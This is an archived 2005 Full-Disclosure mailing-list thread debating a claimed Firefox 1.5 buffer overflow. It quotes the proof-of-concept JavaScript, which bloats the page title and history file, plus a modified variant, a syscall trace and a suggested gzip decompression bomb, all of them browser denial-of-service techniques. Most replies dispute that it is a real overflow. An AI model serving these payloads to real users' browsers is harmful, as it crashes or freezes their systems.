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Re: [Full-disclosure] Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered
- To: Fósforo <fosforo@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered
- From: "ad@xxxxxxxxxxxxxxxx" <ad@xxxxxxxxxxxxxxxx>
- Date: Sat, 10 Dec 2005 14:15:00 +0100
Hash: SHA1
have 2,5Gb DDR2 ram and nothing happen here, it loads during 1 min, then
all is fine.. I guess the sploit coder had 64 Mb edo :D :D
Fósforo wrote:
> It works here.
> seems it depends on how much ram you've. i got 2 blue screens, after
> changed the code a bit. the first one was about MEMORY_MANAGEMENT and
> the second one was a PAGE_FAULT_IN_NONPAGED_AREA. And both occurs
> without user interaction, the second one i just've opened firefox, not
> the bug file (maybe cache ?)
> ps: i've 1Gb of ram
> <html><head><title>heh</title><script type="text/javascript">
> function ex() {
> var buffer = "";
> for (var i = 0; i < 5000; i++) {
> buffer += "A";
> }
> var buffer2 = buffer;
> var buffer3 = buffer2;
> for (i = 0; i < 500; i++) {
> buffer2 += buffer;
> for (i = 0; i < 500; i++) {
> buffer3 += buffer2;
> }
> }
> document.title = buffer2;
> }
> </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
> </a></body></html>
> 2006/1/31, ezdy <ezdy@xxxxxxx>:
>>and theres no reason for it to be working.
>>first let's see what's going on - i loaded provided html in firefox
>>and quitted it.
>>even quitting firefox took a while, but only slightly longer than usual.
>>after starting firefox again, it indeed didn't load, stuck in some
>>kind of disk loop ignoring all macosx ui events.
>>but not swapping. alright, that's strange:
>>ezdy@devastace:~/Desktop/Firefox.app/Contents/MacOS$ ktrace ./firefox-
>>ezdy@devastace:~/Desktop/Firefox.app/Contents/MacOS$ kdump -m 1 |
>>tail -100
>> 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000)
>> 7616 firefox-bin GIO fd 24 read 4096 bytes
>> "0"
>> 7616 firefox-bin RET read 4096/0x1000
>> 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000)
>> 7616 firefox-bin GIO fd 24 read 4096 bytes
>> "0"
>> 7616 firefox-bin RET read 4096/0x1000
>> 7616 firefox-bin CALL lseek(0x18,0x21a000,0)
>> 7616 firefox-bin RET lseek 0
>> 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000)
>> 7616 firefox-bin GIO fd 24 read 4096 bytes
>> "0"
>> 7616 firefox-bin RET read 4096/0x1000
>> 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000)
>> 7616 firefox-bin GIO fd 24 read 4096 bytes
>> "\\"
>> 7616 firefox-bin RET read 4096/0x1000
>> 7616 firefox-bin CALL lseek(0x18,0x21c000,0)
>> 7616 firefox-bin RET lseek 0
>> 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000)
>> 7616 firefox-bin GIO fd 24 read 4096 bytes
>> "A"
>> 7616 firefox-bin RET read 4096/0x1000
>> 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000)
>> 7616 firefox-bin GIO fd 24 read 4096 bytes
>> "A"
>> 7616 firefox-bin RET read 4096/0x1000
>> 7616 firefox-bin CALL lseek(0x18,0x21e000,0)
>> 7616 firefox-bin RET lseek 0
>> 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000)
>>this repeats virtually ad-infinitum until end of history.dat is reached.
>>note that there is never allocated any memory-the same buffer is
>>always used, thus no memory leak.
>>firefox is stuck in loop (and eventually starts, since the string is
>>finite, in my case
>>about 30M) but it took way too longer to load. im not a windows user
>>but since mac is only
>>step away from it (you know apple, let's take win95 and freebsd and
>>mix it together) my guess is
>>it is the same situation of keeping main thread busy and events
>>cannot be passed down, eventualy
>>leading to "application is not responding" killbox.
>>for Z1PL0CK:
>>Don't stop, keep posting fake "buffer overflows" of #darknet
>>trademonkeys (this one actually looked funny in the beggining).
>>This time you made it to get /.ed which is not a bad start, but yo
>>gonna fly higher!
>>Because this bug got killed, i've something better for you:
>>dd if=/dev/zero a 2GB file and gzip it. then just write a php script
>>which sets content-encoding: gzip and
>>fpassthru the file. safari rendered 1.2gb system unresponsible in 5
>>seconds, firefox in about 30. both crashed
>>on "overflows" like this:
>>Safari(233,0xa000ed68) malloc: *** vm_allocate(size=1250000896)
>>failed (error code=3)
>>Safari(233,0xa000ed68) malloc: *** error: can't allocate region
>>Safari(233,0xa000ed68) malloc: *** set a breakpoint in szone_error to
>>for those interested i can send coredumps
>>now THATs SOME SERIOUSLY MAD warez (for those who wants to quickly
>>pollute browser's heap with shellcode: yah, this
>>is a good way).
>>sheesh. is this some 'who invent a stupidier dos attack against
>>browser' contest of some sort or what?
>>On 8.12.2005, at 20:51, Matt wrote:
>>>Didn't work here, just made the system go a bit sluggish for a
>>>moment, as you would expect when dealing with a 2.5 million
>>>character string.
>>>Firefox :
>>>Mozilla/5.0 (X11; U; Linux i686; en-US; rv: 1.8) Gecko/20051130
>>>Built with :
>>>gcc version 3.4.4 (Gentoo 3.4.4-r1, ssp-3.4.4-1.0, pie-8.7.8)
>>>Window manager:
>>>KDE 3.5.0
>>>Possibly it is crashing the Windows API ?
>>>On 12/9/05, Ron <iago@xxxxxxxxxxxxxxxxxxx > wrote:I was also unable
>>>to replicate it, on Firefox 1.5 i386 Linux EN
>>>ad@xxxxxxxxxxxxxxxx wrote:
> nor a fake , nor you really dont know what is a buffer overflow,
>>>>but for
> sure here on my firefox 1.5 EN, the client is much longuer to
>>>>load to
> the next boot but it reloads fine without exceptions and there is
> nothing about a security bug here...
>><!-- Firefox 1.5 buffer overflow
>>Basically firefox logs all kinda of URL data in it's history.dat
>>this little script will set a really large topic and Firefox
>>>>will then
>>save that topic into it's history.dat.. The next time that
>>>>firefox is
>>opened, it will instantly crash due to a buffer overflow -- this
>>happen everytime until you manually delete the history.dat file
>>>>-- >which
>>most users won't figure out.
>>this proof of concept will only prevent someone from reopening
>>their browser after being exploited. DoS if you will. however, code
>>execution is possible with some modifcations.
>>Tested with Firefox 1.5 on Windows XP SP2.
>>ZIPLOCK <sickbeatz@xxxxxxxxx>
>><html><head><title>heh</title><script type="text/javascript">
>>function ex() {
>> var buffer = "";
>> for (var i = 0; i < 5000; i++) {
>> buffer += "A";
>> }
>> var buffer2 = buffer;
>> for (i = 0; i < 500; i++) {
>> buffer2 += buffer;
>> }
>> document.title = buffer2;
>></script></head><body>ZIPLOCK says <a href="javascript:ex
>>>>();">CLICK ME
>>>Full-Disclosure - We believe in it.
>>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>Hosted and sponsored by Secunia - http://secunia.com/
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>Hosted and sponsored by Secunia - http://secunia.com/
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> "O caminho do homem de bem é cercado de
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> e tirania dos homens maus. Abençoados os que,
> em nome da caridade e boa vontade, conduzem
> os fracos pelo vale das sombras, pois ele é
> o guardião de seu irmão e o que encontra os
> filhos perdidos. E eu vou atacar com vingança
> e fúria os que tentarem envenenar e destruir
> meus irmãos. E quando minha vingança se abater
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> (Ezequiel, 25, 17)
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